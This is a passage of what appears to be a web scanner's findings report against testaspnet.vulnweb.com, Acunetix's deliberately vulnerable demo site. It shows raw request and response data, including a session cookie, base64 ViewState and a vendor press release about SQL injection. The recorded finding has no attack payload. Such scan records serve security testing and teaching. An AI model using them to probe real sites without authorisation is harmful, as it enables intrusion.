2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1">
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAg